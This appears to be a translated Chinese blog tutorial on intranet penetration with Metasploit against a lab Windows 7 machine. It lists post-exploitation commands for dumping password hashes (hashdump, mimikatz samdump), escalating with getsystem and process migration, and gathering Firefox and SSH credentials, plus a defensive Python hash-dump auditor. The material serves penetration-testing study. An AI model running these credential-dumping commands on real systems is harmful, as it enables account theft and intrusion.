Intranet Penetration: Intranet Information Gathering (3)
2022-07-06 09:23:00 【不知名白帽】
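Intranet Penetration: Intranet Information Gathering (4) - 不知名白帽's blog - CSDN Blog
Intranet information gathering with Metasploit
Attacker machine: Kali 192.168.0.103
Target machine: Win7 192.168.0.105
07 Password cracking
use post/windows/gather/hashdump // requires a meterpreter session with SYSTEM privileges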
set session 1
exploit // results are saved in the tmp directory
use post/windows/gather/smart_hashdump
set session 1
exploit
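Format
username:RID:LM-HASH:NT-HASH
The RID is a fixed value assigned to each Windows account, similar to the UID and GID on Linux: 500 is Administrator, 501 is Guest, and so on. The LM-hash and NT-hash are both hashed forms of the user's password; they differ only in the algorithm used.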
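As an added example (not code from the original post), the following Python code parses records in the format above and reports what a defender reviewing such a dump would want to fix: accounts with the fixed RIDs 500 and 501, accounts that still have an LM hash stored, and accounts with an empty password. The function names and sample records are assumptions made for illustration; the two constants are the well-known LM and NT hash values of an empty password, and the optional trailing `:::` matches what the hashdump output appends to each record.

```python
import re

# Well-known values: the LM and NT hashes Windows stores for an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# Fixed RIDs named in the text above.
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}

# username:RID:LM-HASH:NT-HASH, optionally followed by the trailing ":::".
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32})(?::.*)?$"
)

def parse_line(line):
    """Split one record into its four fields; return None if it is malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"user": m["user"], "rid": int(m["rid"]),
            "lm": m["lm"].lower(), "nt": m["nt"].lower()}

def audit(lines):
    """Return (user, finding) pairs that call for remediation."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            if line.strip():
                findings.append((None, "malformed record: %r" % line.strip()))
            continue
        if rec["rid"] in WELL_KNOWN_RIDS:
            findings.append((rec["user"], WELL_KNOWN_RIDS[rec["rid"]] + " account"))
        if rec["lm"] != EMPTY_LM:
            findings.append((rec["user"], "LM hash is stored (disable LM hash storage)"))
        if rec["nt"] == EMPTY_NT:
            findings.append((rec["user"], "empty password"))
    return findings

# Constructed sample records (the hash values for alice are made up).
SAMPLE = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "alice:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::",
    "not a record",
]

if __name__ == "__main__":
    for user, finding in audit(SAMPLE):
        print(user, "-", finding)
```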
hashdump uses part of mimikatz's functionality
load mimikatz
wdigest, kerberos, msv, ssp, tspkg, livessp
mimikatz_command -h
mimikatz_command -f a:: // list the available modules
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
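Privilege escalation from a normal user
getuid
Check the current user's privileges
hashdump
Requires administrator privileges
getsystem
This only obtains administrator privileges on the surface; some of the real administrator privileges are still missing
ps
List processes
getpid
Show the current process
migrate
Process migration (migrate from the normal user's process into a process owned by an administrator user)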
hashdump
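08 Other
Determine whether the target host is a virtual machine:
run checkvm
Get information about the software installed on the target host:
run post/windows/gather/enum_applications
Get information about recently accessed documents and links on the target host:
run post/windows/gather/dumplinks
View the target's environment information:
run post/windows/gather/env
View the accounts and passwords stored in Firefox:
run post/windows/gather/firefox_creds
View the ciphertext of SSH account passwords and certificate information: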
run post/windows/gather/ssh_creds